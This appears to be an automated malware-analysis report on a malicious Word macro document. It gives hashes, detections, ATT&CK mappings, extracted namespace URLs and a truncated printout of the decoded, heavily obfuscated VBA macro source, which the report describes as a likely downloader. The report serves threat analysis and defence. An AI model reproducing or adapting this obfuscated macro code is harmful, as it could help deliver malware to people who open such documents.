Office (OLE) malware analysis — malicious · 01748620a67cf331

MALICIOUS

Office (OLE)

191.0 KB Created: 2018-05-14 15:22:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 888fc820b3c5a29ca0c2641b1f69b618 SHA-1: fc98b3e3db78fb499d08e89773fc7e6fecd5c7b2 SHA-256: 01748620a67cf33122ed0a542eca38b36c9fbfb1876797b71b7f27393a207804

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute automatically. Heuristics indicate a lure to enable macros, a common tactic for malware droppers. The VBA script appears to be obfuscated but likely attempts to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader.Macro'. The embedded URL is likely part of this download mechanism.

Heuristics 6

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- https://api.informationprotection.azure.com/api/31ae1cef-2393-4eb1-8962-4e4bbfccd663In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12920 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12920 bytes
SHA-256: `e0c74302b9466d9af41aab0b6fdd7924196b3925be8fdfdb428a2d755b13289d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fulciment(goatish, aerosolized, know) Dim aghast As Variant Dim coffeepot As Variant Dim mnemonic As LongPtr Dim occupancy As LongPtr Dim cannulation As LongPtr Dim housing As String Dim pitymys As LongPtr Dim autotelic As LongPtr biodegradable = dishearten unfolding = Fix(383) occupancy = goatish autotelic = know unfolding = laconically + 433 pitymys = aerosolized broadband = 32 + 16 Pmt 0, broadband, 34371, 10250, 4 dishearten = "millihenry" mnemonic = 51 - 42 - 10 semidesert ByVal mnemonic, _ occupancy, _ pitymys, autotelic, _ cannulation dishearten = "nonphilosophical" End Function Function boasting(accounting) Dim distract As Long Dim inexpectant As String Dim expensiveness As Long Dim fit As Variant #If (3 - 96 + 493 + 36 - 47 + 311) > ((37 - 68 + 351) - (78 - 68 + 530) * 1) And ((97 - 26 - 43) - (104 - 26 - 50)) * 2 < (Win64) Then Dim laws As String Dim redetermination As LongPtr abstinent = 43 - 23 - 12 Dim otariidae As LongPtr Dim macleaya As Long Dim thornless As String Dim shillings As LongPtr Dim moated As Byte trickedout = VarPtr(redetermination) fasciola = fulciment(trickedout, VarPtr(accounting) + (105 - 81 - 16), abstinent) #ElseIf (2 - 51 + 449 + 96 - 64 + 268) > ((59 - 23 + 284) - (32 - 119 + 627) * 1) And Not ((114 - 72 - 14) - (95 - 11 - 56)) * 2 < (Win64) Then Dim redetermination As Long abstinent = 124 - 61 - 59 Dim otariidae As Long Dim shillings As Long trickedout = VarPtr(redetermination) fasciola = refrigeratory(trickedout, VarPtr(accounting) + (19 - 55 + 44), abstinent) #End If heinous = 114 - 10 - 105 otariidae = 106 - 2 - 104 paraplegic = 124 - 93 - 31 shillings = 81 - 27 + 9381 ceremonies = 78 - 107 + 4125 elephas = 31 - 46 + 79 cousin = tyrannic(ByVal heinous, _ otariidae, ByVal paraplegic, shillings, ByVal ceremonies, _ ByVal elephas) biodegradable = "cerrado" sapphism = Math.Round(234) #If (121 - 55 + 334 + 65 - 111 + 346) > ((28 - 23 + 315) - (86 - 111 + 565) * 1) And ((118 - 20 - 70) - (109 - 73 - 8)) * 2 < (Win64) Then phyllidae = fulciment(otariidae, redetermination, 94 - 89 + 5878) #ElseIf (70 - 96 + 426 + 85 - 108 + 323) > ((51 - 79 + 348) - (122 - 4 + 422) * 1) And Not ((13 - 18 + 33) - (115 - 53 - 34)) * 2 < (Win64) Then filth = refrigeratory(otariidae, redetermination, 6 - 36 + 5913) #End If pros = 32 + 48 Pmt 0, pros, 29463, 51451, 2 boasting = otariidae End Function Sub grocer() Dim gaseousness As Integer Dim instructed As String simpson.jars.Value = Day(#12/5/2013#) varday = ametabolic = "capsheaf" athletic = dimidium arteriosclerosis = "abate" journalist = "memoria" oxbow = "campephilus" maneuverability = "preliminary" aristocratically = punctiliousness matchstick = "morisco" Set blessedness = simpson.jars.SelectedItem espy = 36 + 41 Pmt 0, espy, 39016, 18001, 5 debugger = blessedness.Name attraction = 57 - 80 + 7867 micrography = Right(debugger, attraction) cahoot = capitalsprint.actualized(micrography) dandelion = 14 + 17 Pmt 0, dandelion, 26480, 18041, 7 equiangular = "despumate" selfaddressed = "advisability" #If (73 - 61 + 388 + 13 - 111 + 398) > ((22 - 85 + 383) - (106 - 29 + 463) * 1) And ((59 - 19 - 12) - (29 - 49 + 48)) * 2 < (Win64) Then Dim concordant As Byte Dim outandouter As LongPtr Dim bookshelf As LongPtr Dim pandanales As Long #ElseIf (7 - 55 + 448 + 75 - 37 + 262) > ((35 - 111 + 396) - (119 - 35 + 456) * 1) And Not ((38 - 48 + 38) - (78 - 86 + 36)) * 2 < (Win64) Then Dim appease As String Dim bookshelf As Long Dim rakishness As Byte Dim outandouter As Long #End If wifely = 92 - 100 + 8 midgard = "magazine" prosauropoda = 73 - 20 + 4043 feces = 38 + 32 Pmt 0, feces, 22442, 19980, 3 catostomid = "dripping" artistic = "syneresis" alleviation = ... (truncated)

SHA-256: e0c74302b9466d9af41aab0b6fdd7924196b3925be8fdfdb428a2d755b13289d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fulciment(goatish, aerosolized, know)
Dim aghast As Variant
Dim coffeepot As Variant
Dim mnemonic As LongPtr
Dim occupancy As LongPtr
Dim cannulation As LongPtr
Dim housing As String
Dim pitymys As LongPtr
Dim autotelic As LongPtr
biodegradable = dishearten
unfolding = Fix(383)
occupancy = goatish
autotelic = know
unfolding = laconically + 433
pitymys = aerosolized
broadband = 32 + 16
 Pmt 0, broadband, 34371, 10250, 4

dishearten = "millihenry"
mnemonic = 51 - 42 - 10
semidesert ByVal mnemonic, _
occupancy, _
pitymys, autotelic, _
cannulation
dishearten = "nonphilosophical"
End Function
Function boasting(accounting)
Dim distract As Long
Dim inexpectant As String
Dim expensiveness As Long
Dim fit As Variant
#If (3 - 96 + 493 + 36 - 47 + 311) > ((37 - 68 + 351) - (78 - 68 + 530) * 1) And ((97 - 26 - 43) - (104 - 26 - 50)) * 2 < (Win64) Then
Dim laws As String
Dim redetermination As LongPtr
abstinent = 43 - 23 - 12
Dim otariidae As LongPtr
Dim macleaya As Long
Dim thornless As String
Dim shillings As LongPtr
Dim moated As Byte
trickedout = VarPtr(redetermination)
fasciola = fulciment(trickedout, VarPtr(accounting) + (105 - 81 - 16), abstinent)
#ElseIf (2 - 51 + 449 + 96 - 64 + 268) > ((59 - 23 + 284) - (32 - 119 + 627) * 1) And Not ((114 - 72 - 14) - (95 - 11 - 56)) * 2 < (Win64) Then
Dim redetermination As Long
abstinent = 124 - 61 - 59
Dim otariidae As Long
Dim shillings As Long
trickedout = VarPtr(redetermination)
fasciola = refrigeratory(trickedout, VarPtr(accounting) + (19 - 55 + 44), abstinent)
#End If
heinous = 114 - 10 - 105
otariidae = 106 - 2 - 104
paraplegic = 124 - 93 - 31
shillings = 81 - 27 + 9381
ceremonies = 78 - 107 + 4125
elephas = 31 - 46 + 79
cousin = tyrannic(ByVal heinous, _
otariidae, ByVal paraplegic, shillings, ByVal ceremonies, _
ByVal elephas)
biodegradable = "cerrado"

sapphism = Math.Round(234)

#If (121 - 55 + 334 + 65 - 111 + 346) > ((28 - 23 + 315) - (86 - 111 + 565) * 1) And ((118 - 20 - 70) - (109 - 73 - 8)) * 2 < (Win64) Then
phyllidae = fulciment(otariidae, redetermination, 94 - 89 + 5878)
#ElseIf (70 - 96 + 426 + 85 - 108 + 323) > ((51 - 79 + 348) - (122 - 4 + 422) * 1) And Not ((13 - 18 + 33) - (115 - 53 - 34)) * 2 < (Win64) Then
filth = refrigeratory(otariidae, redetermination, 6 - 36 + 5913)
#End If
pros = 32 + 48
 Pmt 0, pros, 29463, 51451, 2

boasting = otariidae
End Function
Sub grocer()
Dim gaseousness As Integer
Dim instructed As String
simpson.jars.Value = Day(#12/5/2013#)
varday = ametabolic = "capsheaf"
athletic = dimidium
arteriosclerosis = "abate"
journalist = "memoria"
oxbow = "campephilus"

maneuverability = "preliminary"
aristocratically = punctiliousness
matchstick = "morisco"
Set blessedness = simpson.jars.SelectedItem
espy = 36 + 41
 Pmt 0, espy, 39016, 18001, 5

debugger = blessedness.Name
attraction = 57 - 80 + 7867
micrography = Right(debugger, attraction)
cahoot = capitalsprint.actualized(micrography)
dandelion = 14 + 17
 Pmt 0, dandelion, 26480, 18041, 7

equiangular = "despumate"
selfaddressed = "advisability"
#If (73 - 61 + 388 + 13 - 111 + 398) > ((22 - 85 + 383) - (106 - 29 + 463) * 1) And ((59 - 19 - 12) - (29 - 49 + 48)) * 2 < (Win64) Then
Dim concordant As Byte
Dim outandouter As LongPtr
Dim bookshelf As LongPtr
Dim pandanales As Long
#ElseIf (7 - 55 + 448 + 75 - 37 + 262) > ((35 - 111 + 396) - (119 - 35 + 456) * 1) And Not ((38 - 48 + 38) - (78 - 86 + 36)) * 2 < (Win64) Then
Dim appease As String
Dim bookshelf As Long
Dim rakishness As Byte
Dim outandouter As Long
#End If
wifely = 92 - 100 + 8
midgard = "magazine"
prosauropoda = 73 - 20 + 4043
feces = 38 + 32
 Pmt 0, feces, 22442, 19980, 3

catostomid = "dripping"
artistic = "syneresis"
alleviation = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.